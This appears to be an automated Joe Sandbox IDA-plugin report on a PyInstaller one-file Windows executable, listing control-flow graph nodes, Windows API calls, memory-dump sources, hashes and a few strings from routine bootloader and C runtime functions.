18359 7ff6aba55e48 _get_daylight 11 API calls 18357->18359 18357->18360 18361 7ff6aba50413 18358->18361 18362 7ff6aba504c8 18359->18362 18360->18230 18363 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 18361->18363 18364 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 18362->18364 18363->18357 18364->18360 18367 7ff6aba5fea9 18365->18367 18366 7ff6aba55e48 _get_daylight 11 API calls 18368 7ff6aba5feb8 18366->18368 18369 7ff6aba5611d 18367->18369 18370 7ff6aba5feae 18367->18370 18372 7ff6aba5fef8 18367->18372 18371 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 18368->18371 18369->18203 18369->18204 18370->18366 18370->18369 18371->18369 18372->18369 18373 7ff6aba55e48 _get_daylight 11 API calls 18372->18373 18373->18368 18379 7ff6aba5ff7c 18374->18379 18377 7ff6aba6031b 18377->18214 18378 7ff6aba60335 InitializeCriticalSectionAndSpinCount 18378->18377 18380 7ff6aba5ffd9 18379->18380 18387 7ff6aba5ffd4 __vcrt_InitializeCriticalSectionEx 18379->18387 18380->18377 18380->18378 18381 7ff6aba60009 LoadLibraryExW 18383 7ff6aba600de 18381->18383 18384 7ff6aba6002e GetLastError 18381->18384 18382 7ff6aba600fe GetProcAddress 18382->18380 18386 7ff6aba6010f 18382->18386 18383->18382 18385 7ff6aba600f5 FreeLibrary 18383->18385 18384->18387 18385->18382 18386->18380 18387->18380 18387->18381 18387->18382 18388 7ff6aba60068 LoadLibraryExW 18387->18388 18388->18383 18388->18387 18390 7ff6aba41dd6 18389->18390 18393 7ff6aba5567c 18390->18393 18392 7ff6aba41dec 18392->18224 18394 7ff6aba556a6 18393->18394 18395 7ff6aba556de 18394->18395 18397 7ff6aba55711 18394->18397 18396 7ff6aba5b758 _invalid_parameter_noinfo 37 API calls 18395->18396 18399 7ff6aba55707 18396->18399 18400 7ff6aba50118 18397->18400 18399->18392 18407 7ff6aba562dc EnterCriticalSection 18400->18407 18409 7ff6aba59194 18408->18409 18410 7ff6aba59181 18408->18410 18418 7ff6aba58df8 18409->18418 18411 7ff6aba55e48 _get_daylight 11 API calls 18410->18411 18413 7ff6aba59186 18411->18413 18415 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 18413->18415 18416 7ff6aba59192 18415->18416 18416->17444 18425 7ff6aba61548 EnterCriticalSection 18418->18425 18427 7ff6aba47bf1 GetTokenInformation 18426->18427 18428 7ff6aba47c73 __std_exception_copy 18426->18428 18429 7ff6aba47c1d 18427->18429 18430 7ff6aba47c12 GetLastError 18427->18430 18431 7ff6aba47c86 CloseHandle 18428->18431 18432 7ff6aba47c8c 18428->18432 18429->18428 18433 7ff6aba47c39 GetTokenInformation 18429->18433 18430->18428 18430->18429 18431->18432 18432->17449 18433->18428 18435 7ff6aba47c5c 18433->18435 18434 7ff6aba47c66 ConvertSidToStringSidW 18434->18428 18435->18428 18435->18434 18437 7ff6aba4be10 18436->18437 18438 7ff6aba42244 GetCurrentProcessId 18437->18438 18439 7ff6aba41d50 48 API calls 18438->18439 18440 7ff6aba42295 18439->18440 18441 7ff6aba55b18 48 API calls 18440->18441 18442 7ff6aba422d3 18441->18442 18443 7ff6aba41e00 78 API calls 18442->18443 18444 7ff6aba422f1 18443->18444 18445 7ff6aba4bb10 _log10_special 8 API calls 18444->18445 18446 7ff6aba42301 18445->18446 18446->17459 18448 7ff6aba48785 18447->18448 18449 7ff6aba55b18 48 API calls 18448->18449 18450 7ff6aba487a4 18449->18450 18450->17474 18455 7ff6aba4761c 18454->18455 18456 7ff6aba48950 2 API calls 18455->18456 18457 7ff6aba4763b 18456->18457 18719 7ff6aba4397a 18718->18719 18720 7ff6aba48950 2 API calls 18719->18720 18721 7ff6aba4399f 18720->18721 18722 7ff6aba4bb10 _log10_special 8 API calls 18721->18722 18723 7ff6aba439c7 18722->18723 18723->17512 18726 7ff6aba4726e 18724->18726 18725 7ff6aba47392 18728 7ff6aba4bb10 _log10_special 8 API calls 18725->18728 18726->18725 18727 7ff6aba41c60 49 API calls 18726->18727 18732 7ff6aba472f5 18727->18732 18729 7ff6aba473c3 18728->18729 18729->17512 18730 7ff6aba41c60 49 API calls 18730->18732 18731 7ff6aba43970 10 API calls 18731->18732 18732->18725 18732->18730 18732->18731 18733 7ff6aba48950 2 API calls 18732->18733 18734 7ff6aba47363 CreateDirectoryW 18733->18734 18734->18725 18734->18732 18736 7ff6aba41617 18735->18736 18737 7ff6aba415f3 18735->18737 18739 7ff6aba439d0 108 API calls 18736->18739 18856 7ff6aba41030 18737->18856 18741 7ff6aba4162b 18739->18741 18743 7ff6aba41633 18741->18743 18744 7ff6aba41662 18741->18744 18747 7ff6aba55e48 _get_daylight 11 API calls 18743->18747 18745 7ff6aba439d0 108 API calls 18744->18745 18749 7ff6aba41676 18745->18749 18748 7ff6aba41638 18747->18748 18784 7ff6aba465cb 18783->18784 18786 7ff6aba46584 18783->18786 18784->17512 18786->18784 18920 7ff6aba55f64 18786->18920 18788 7ff6aba435b1 18787->18788 18789 7ff6aba438f0 49 API calls 18788->18789 18790 7ff6aba435eb 18789->18790 18791 7ff6aba438f0 49 API calls 18790->18791 18792 7ff6aba435fb 18791->18792 18793 7ff6aba4361d 18792->18793 18794 7ff6aba4364c 18792->18794 18951 7ff6aba43520 18793->18951 18832 7ff6aba41c60 49 API calls 18831->18832 18833 7ff6aba43884 18832->18833 18833->17512 18857 7ff6aba439d0 108 API calls 18856->18857 18858 7ff6aba4106c 18857->18858 18859 7ff6aba41089 18858->18859 18860 7ff6aba41074 18858->18860 18862 7ff6aba4fc2c 73 API calls 18859->18862 18861 7ff6aba41e50 81 API calls 18860->18861 18921 7ff6aba55f9e 18920->18921 18922 7ff6aba55f71 18920->18922 18924 7ff6aba55fc1 18921->18924 18927 7ff6aba55fdd 18921->18927 18923 7ff6aba55e48 _get_daylight 11 API calls 18922->18923 18932 7ff6aba55f28 18922->18932 18925 7ff6aba55f7b 18923->18925 18926 7ff6aba55e48 _get_daylight 11 API calls 18924->18926 18929 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 18925->18929 18930 7ff6aba55fc6 18926->18930 18935 7ff6aba55e8c 18927->18935 18932->18786 18936 7ff6aba55eab 18935->18936 18937 7ff6aba55eb0 18935->18937 18937->18936 19015 7ff6aba56e88 19014->19015 19016 7ff6aba56eae 19015->19016 19018 7ff6aba56ee1 19015->19018 19017 7ff6aba55e48 _get_daylight 11 API calls 19016->19017 19019 7ff6aba56eb3 19017->19019 19020 7ff6aba56ee7 19018->19020 19021 7ff6aba56ef4 19018->19021 19022 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 19019->19022 19023 7ff6aba55e48 _get_daylight 11 API calls 19020->19023 19033 7ff6aba5bb30 19021->19033 19032 7ff6aba43a26 19022->19032 19023->19032 19032->17537 19046 7ff6aba61548 EnterCriticalSection 19033->19046 19406 7ff6aba58834 19405->19406 19409 7ff6aba58310 19406->19409 19408 7ff6aba5884d 19408->17547 19410 7ff6aba5832b 19409->19410 19411 7ff6aba5835a 19409->19411 19412 7ff6aba5b758 _invalid_parameter_noinfo 37 API calls 19410->19412 19419 7ff6aba562dc EnterCriticalSection 19411->19419 19414 7ff6aba5834b 19412->19414 19414->19408 19421 7ff6aba4f39b 19420->19421 19422 7ff6aba4f3c9 19420->19422 19423 7ff6aba5b758 _invalid_parameter_noinfo 37 API calls 19421->19423 19429 7ff6aba4f3bb 19422->19429 19430 7ff6aba562dc EnterCriticalSection 19422->19430 19423->19429 19429->17551 19432 7ff6aba439d0 108 API calls 19431->19432 19433 7ff6aba41473 19432->19433 19434 7ff6aba4149c 19433->19434 19538 7ff6aba457b5 19537->19538 19539 7ff6aba41c60 49 API calls 19538->19539 19540 7ff6aba457f1 19539->19540 19541 7ff6aba4581d 19540->19541 19542 7ff6aba457fa 19540->19542 19544 7ff6aba43a40 49 API calls 19541->19544 19543 7ff6aba41e50 81 API calls 19542->19543 19560 7ff6aba45813 19543->19560 19545 7ff6aba45835 19544->19545 19547 7ff6aba4bb10 _log10_special 8 API calls 19560->19547 19827 7ff6aba5c050 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19826->19827 19828 7ff6aba5b361 19827->19828 19831 7ff6aba5b40c 19828->19831 19840 7ff6aba648c0 19831->19840 19866 7ff6aba64878 19840->19866 19871 7ff6aba61548 EnterCriticalSection 19866->19871 19875 7ff6aba60bfc 19876 7ff6aba60dee 19875->19876 19879 7ff6aba60c3e _isindst 19875->19879 19877 7ff6aba55e48 _get_daylight 11 API calls 19876->19877 19895 7ff6aba60dde 19877->19895 19878 7ff6aba4bb10 _log10_special 8 API calls 19880 7ff6aba60e09 19878->19880 19879->19876 19881 7ff6aba60cbe _isindst 19879->19881 19896 7ff6aba67404 19881->19896 19886 7ff6aba60e1a 19888 7ff6aba5b844 _isindst 17 API calls 19886->19888 19890 7ff6aba60e2e 19888->19890 19893 7ff6aba60d1b 19893->19895 19920 7ff6aba67448 19893->19920 19895->19878 19897 7ff6aba67413 19896->19897 19898 7ff6aba60cdc 19896->19898 19927 7ff6aba61548 EnterCriticalSection 19897->19927 19902 7ff6aba66808 19898->19902 19903 7ff6aba60cf1 19902->19903 19904 7ff6aba66811 19902->19904 19903->19886 19908 7ff6aba66838 19903->19908 19905 7ff6aba55e48 _get_daylight 11 API calls 19904->19905 19906 7ff6aba66816 19905->19906 19907 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 19906->19907 19907->19903 19909 7ff6aba60d02 19908->19909 19910 7ff6aba66841 19908->19910 19909->19886 19914 7ff6aba66868 19909->19914 19911 7ff6aba55e48 _get_daylight 11 API calls 19910->19911 19912 7ff6aba66846 19911->19912 19913 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 19912->19913 19913->19909 19915 7ff6aba60d13 19914->19915 19916 7ff6aba66871 19914->19916 19915->19886 19915->19893 19917 7ff6aba55e48 _get_daylight 11 API calls 19916->19917 19918 7ff6aba66876 19917->19918 19919 7ff6aba5b824 _invalid_parameter_noinfo 37 API calls 19918->19919 19919->19915 19928 7ff6aba61548 EnterCriticalSection 19920->19928 21238 7ff6aba56280 21239 7ff6aba5628b 21238->21239 21247 7ff6aba60514 21239->21247 21260 7ff6aba61548 EnterCriticalSection 21247->21260

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 0 7ff6aba48020-7ff6aba48166 call 7ff6aba4be10 call 7ff6aba48950 SetConsoleCtrlHandler GetStartupInfoW call 7ff6aba56260 call 7ff6aba5b384 call 7ff6aba59658 call 7ff6aba56260 call 7ff6aba5b384 call 7ff6aba59658 call 7ff6aba56260 call 7ff6aba5b384 call 7ff6aba59658 GetCommandLineW CreateProcessW 23 7ff6aba4818d-7ff6aba481c9 RegisterClassW 0->23 24 7ff6aba48168-7ff6aba48188 GetLastError call 7ff6aba42310 0->24 26 7ff6aba481cb GetLastError 23->26 27 7ff6aba481d1-7ff6aba48225 CreateWindowExW 23->27 31 7ff6aba48479-7ff6aba4849f call 7ff6aba4bb10 24->31 26->27 29 7ff6aba48227-7ff6aba4822d GetLastError 27->29 30 7ff6aba4822f-7ff6aba48234 ShowWindow 27->30 32 7ff6aba4823a-7ff6aba4824a WaitForSingleObject 29->32 30->32 34 7ff6aba4824c 32->34 35 7ff6aba482c8-7ff6aba482cf 32->35 39 7ff6aba48250-7ff6aba48253 34->39 36 7ff6aba48312-7ff6aba48319 35->36 37 7ff6aba482d1-7ff6aba482e1 WaitForSingleObject 35->37 44 7ff6aba4831f-7ff6aba48335 QueryPerformanceFrequency QueryPerformanceCounter 36->44 45 7ff6aba48400-7ff6aba48419 GetMessageW 36->45 42 7ff6aba482e7-7ff6aba482f7 TerminateProcess 37->42 43 7ff6aba48438-7ff6aba48442 37->43 40 7ff6aba4825b-7ff6aba48262 39->40 41 7ff6aba48255 GetLastError 39->41 40->37 46 7ff6aba48264-7ff6aba48281 PeekMessageW 40->46 41->40 51 7ff6aba482f9 GetLastError 42->51 52 7ff6aba482ff-7ff6aba4830d WaitForSingleObject 42->52 49 7ff6aba48444-7ff6aba4844a DestroyWindow 43->49 50 7ff6aba48451-7ff6aba48475 GetExitCodeProcess CloseHandle * 2 43->50 53 7ff6aba48340-7ff6aba48378 MsgWaitForMultipleObjects PeekMessageW 44->53 47 7ff6aba4841b-7ff6aba48429 TranslateMessage DispatchMessageW 45->47 48 7ff6aba4842f-7ff6aba48436 45->48 54 7ff6aba482b6-7ff6aba482c6 WaitForSingleObject 46->54 55 7ff6aba48283-7ff6aba482b4 TranslateMessage DispatchMessageW PeekMessageW 46->55 47->48 48->43 48->45 49->50 50->31 51->52 52->43 56 7ff6aba4837a 53->56 57 7ff6aba483b3-7ff6aba483ba 53->57 54->35 54->39 55->54 55->55 59 7ff6aba48380-7ff6aba483b1 TranslateMessage DispatchMessageW PeekMessageW 56->59 57->45 58 7ff6aba483bc-7ff6aba483e5 QueryPerformanceCounter 57->58 58->53 60 7ff6aba483eb-7ff6aba483f2 58->60 59->57 59->59 60->43 61 7ff6aba483f4-7ff6aba483f8 60->61 61->45
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorLastMessage$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                                        • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                                        • API String ID: 4208240515-3165540532
                                                                                                                                                                                                                                                        • Opcode ID: 40a2b2c96db5062fbaff54aa02804a1320958b809a954de9be60782f8870c354
                                                                                                                                                                                                                                                        • Instruction ID: e6eb9e40ad4aec229f224fa371cd70f33f5e29aed7557db529e0e92e7d22ebb3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 40a2b2c96db5062fbaff54aa02804a1320958b809a954de9be60782f8870c354
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3D15772A0AB8296EB109F78E8642AD3760FF48B98F404235DB5D97AB4EF3CD155C740

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 505 7ff6aba66e70-7ff6aba66eab call 7ff6aba667f8 call 7ff6aba66800 call 7ff6aba66868 512 7ff6aba670d5-7ff6aba67121 call 7ff6aba5b844 call 7ff6aba667f8 call 7ff6aba66800 call 7ff6aba66868 505->512 513 7ff6aba66eb1-7ff6aba66ebc call 7ff6aba66808 505->513 538 7ff6aba67127-7ff6aba67132 call 7ff6aba66808 512->538 539 7ff6aba6725f-7ff6aba672cd call 7ff6aba5b844 call 7ff6aba627e8 512->539 513->512 519 7ff6aba66ec2-7ff6aba66ecc 513->519 521 7ff6aba66eee-7ff6aba66ef2 519->521 522 7ff6aba66ece-7ff6aba66ed1 519->522 523 7ff6aba66ef5-7ff6aba66efd 521->523 525 7ff6aba66ed4-7ff6aba66edf 522->525 523->523 526 7ff6aba66eff-7ff6aba66f12 call 7ff6aba5e6c4 523->526 528 7ff6aba66eea-7ff6aba66eec 525->528 529 7ff6aba66ee1-7ff6aba66ee8 525->529 536 7ff6aba66f2a-7ff6aba66f36 call 7ff6aba5b464 526->536 537 7ff6aba66f14-7ff6aba66f16 call 7ff6aba5b464 526->537 528->521 530 7ff6aba66f1b-7ff6aba66f29 528->530 529->525 529->528 547 7ff6aba66f3d-7ff6aba66f45 536->547 537->530 538->539 548 7ff6aba67138-7ff6aba67143 call 7ff6aba66838 538->548 557 7ff6aba672db-7ff6aba672de 539->557 558 7ff6aba672cf-7ff6aba672d6 539->558 547->547 550 7ff6aba66f47-7ff6aba66f58 call 7ff6aba616e4 547->550 548->539 559 7ff6aba67149-7ff6aba6716c call 7ff6aba5b464 GetTimeZoneInformation 548->559 550->512 560 7ff6aba66f5e-7ff6aba66fb4 call 7ff6aba6b740 * 4 call 7ff6aba66d8c 550->560 563 7ff6aba67315-7ff6aba67328 call 7ff6aba5e6c4 557->563 564 7ff6aba672e0 557->564 562 7ff6aba6736b-7ff6aba6736e 558->562 573 7ff6aba67172-7ff6aba67193 559->573 574 7ff6aba67234-7ff6aba6725e call 7ff6aba667f0 call 7ff6aba667e0 call 7ff6aba667e8 559->574 618 7ff6aba66fb6-7ff6aba66fba 560->618 567 7ff6aba672e3 call 7ff6aba670ec 562->567 569 7ff6aba67374-7ff6aba6737c call 7ff6aba66e70 562->569 577 7ff6aba6732a 563->577 578 7ff6aba67333-7ff6aba6734e call 7ff6aba627e8 563->578 564->567 580 7ff6aba672e8-7ff6aba67314 call 7ff6aba5b464 call 7ff6aba4bb10 567->580 569->580 581 7ff6aba67195-7ff6aba6719b 573->581 582 7ff6aba6719e-7ff6aba671a5 573->582 585 7ff6aba6732c-7ff6aba67331 call 7ff6aba5b464 577->585 603 7ff6aba67355-7ff6aba67367 call 7ff6aba5b464 578->603 604 7ff6aba67350-7ff6aba67353 578->604 581->582 589 7ff6aba671a7-7ff6aba671af 582->589 590 7ff6aba671b9 582->590 585->564 589->590 598 7ff6aba671b1-7ff6aba671b7 589->598 596 7ff6aba671bb-7ff6aba6722f call 7ff6aba6b740 * 4 call 7ff6aba63dcc call 7ff6aba67384 * 2 590->596 596->574 598->596 603->562 604->585 620 7ff6aba66fbc 618->620 621 7ff6aba66fc0-7ff6aba66fc4 618->621 620->621 621->618 623 7ff6aba66fc6-7ff6aba66feb call 7ff6aba57b18 621->623 628 7ff6aba66fee-7ff6aba66ff2 623->628 630 7ff6aba66ff4-7ff6aba66fff 628->630 631 7ff6aba67001-7ff6aba67005 628->631 630->631 633 7ff6aba67007-7ff6aba6700b 630->633 631->628 635 7ff6aba6700d-7ff6aba67035 call 7ff6aba57b18 633->635 636 7ff6aba6708c-7ff6aba67090 633->636 645 7ff6aba67037 635->645 646 7ff6aba67053-7ff6aba67057 635->646 638 7ff6aba67097-7ff6aba670a4 636->638 639 7ff6aba67092-7ff6aba67094 636->639 641 7ff6aba670a6-7ff6aba670bc call 7ff6aba66d8c 638->641 642 7ff6aba670bf-7ff6aba670ce call 7ff6aba667f0 call 7ff6aba667e0 638->642 639->638 641->642 642->512 649 7ff6aba6703a-7ff6aba67041 645->649 646->636 651 7ff6aba67059-7ff6aba67077 call 7ff6aba57b18 646->651 649->646 652 7ff6aba67043-7ff6aba67051 649->652 657 7ff6aba67083-7ff6aba6708a 651->657 652->646 652->649 657->636 658 7ff6aba67079-7ff6aba6707d 657->658 658->636 659 7ff6aba6707f 658->659 659->657
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6ABA66EB5
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA66808: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6ABA6681C
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA5B464: RtlFreeHeap.NTDLL(?,?,?,00007FF6ABA63F92,?,?,?,00007FF6ABA63FCF,?,?,00000000,00007FF6ABA64495,?,?,?,00007FF6ABA643C7), ref: 00007FF6ABA5B47A
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA5B464: GetLastError.KERNEL32(?,?,?,00007FF6ABA63F92,?,?,?,00007FF6ABA63FCF,?,?,00000000,00007FF6ABA64495,?,?,?,00007FF6ABA643C7), ref: 00007FF6ABA5B484
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA5B844: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6ABA5B823,?,?,?,?,?,00007FF6ABA5B70E), ref: 00007FF6ABA5B84D
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA5B844: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6ABA5B823,?,?,?,?,?,00007FF6ABA5B70E), ref: 00007FF6ABA5B872
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6ABA66EA4
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA66868: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6ABA6687C
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6ABA6711A
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6ABA6712B
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6ABA6713C
                                                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6ABA6737C), ref: 00007FF6ABA67163
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                                        • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                        • API String ID: 4070488512-239921721
                                                                                                                                                                                                                                                        • Opcode ID: 1cc6d2bc0113d7e20a77d6be4757883c424c8a6b3909b765b0ec1a4afa43a119
                                                                                                                                                                                                                                                        • Instruction ID: 0dca73062300af1a315cc2a6156c63d19862a5a5ab79575d2ae13472c4d92a46
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1cc6d2bc0113d7e20a77d6be4757883c424c8a6b3909b765b0ec1a4afa43a119
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27D1C1A6E1A64286EB24DF29D8611B96762FF4C794F404136EF0DC7AA6FE3CE441C740

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 719 7ff6aba67bd4-7ff6aba67c47 call 7ff6aba67908 722 7ff6aba67c49-7ff6aba67c52 call 7ff6aba55e28 719->722 723 7ff6aba67c61-7ff6aba67c6b call 7ff6aba5945c 719->723 730 7ff6aba67c55-7ff6aba67c5c call 7ff6aba55e48 722->730 728 7ff6aba67c6d-7ff6aba67c84 call 7ff6aba55e28 call 7ff6aba55e48 723->728 729 7ff6aba67c86-7ff6aba67cef CreateFileW 723->729 728->730 733 7ff6aba67d6c-7ff6aba67d77 GetFileType 729->733 734 7ff6aba67cf1-7ff6aba67cf7 729->734 741 7ff6aba67fa2-7ff6aba67fc2 730->741 736 7ff6aba67dca-7ff6aba67dd1 733->736 737 7ff6aba67d79-7ff6aba67db4 GetLastError call 7ff6aba55dbc CloseHandle 733->737 739 7ff6aba67d39-7ff6aba67d67 GetLastError call 7ff6aba55dbc 734->739 740 7ff6aba67cf9-7ff6aba67cfd 734->740 744 7ff6aba67dd9-7ff6aba67ddc 736->744 745 7ff6aba67dd3-7ff6aba67dd7 736->745 737->730 753 7ff6aba67dba-7ff6aba67dc5 call 7ff6aba55e48 737->753 739->730 740->739 746 7ff6aba67cff-7ff6aba67d37 CreateFileW 740->746 751 7ff6aba67de2-7ff6aba67e37 call 7ff6aba59374 744->751 752 7ff6aba67dde 744->752 745->751 746->733 746->739 758 7ff6aba67e56-7ff6aba67e87 call 7ff6aba67688 751->758 759 7ff6aba67e39-7ff6aba67e45 call 7ff6aba67b10 751->759 752->751 753->730 765 7ff6aba67e8d-7ff6aba67ecf 758->765 766 7ff6aba67e89-7ff6aba67e8b 758->766 759->758 764 7ff6aba67e47 759->764 767 7ff6aba67e49-7ff6aba67e51 call 7ff6aba5b9c8 764->767 768 7ff6aba67ef1-7ff6aba67efc 765->768 769 7ff6aba67ed1-7ff6aba67ed5 765->769 766->767 767->741 772 7ff6aba67f02-7ff6aba67f06 768->772 773 7ff6aba67fa0 768->773 769->768 771 7ff6aba67ed7-7ff6aba67eec 769->771 771->768 772->773 775 7ff6aba67f0c-7ff6aba67f51 CloseHandle CreateFileW 772->775 773->741 776 7ff6aba67f86-7ff6aba67f9b 775->776 777 7ff6aba67f53-7ff6aba67f81 GetLastError call 7ff6aba55dbc call 7ff6aba5959c 775->777 776->773 777->776
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1617910340-0
                                                                                                                                                                                                                                                        • Opcode ID: f7d25cc6398c99507331e2d119a18c280b6cb5988aed80ed714a7f2df808d279
                                                                                                                                                                                                                                                        • Instruction ID: cb1d75f1ef406c19759e57f71fd739c67fefa11134a5efb2c9940b2e8a1323dd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f7d25cc6398c99507331e2d119a18c280b6cb5988aed80ed714a7f2df808d279
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 78C1C173B2AA4285EB10CF69D4906BC3762F74DBA8B010225DF2E977A5EF38D555C300

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
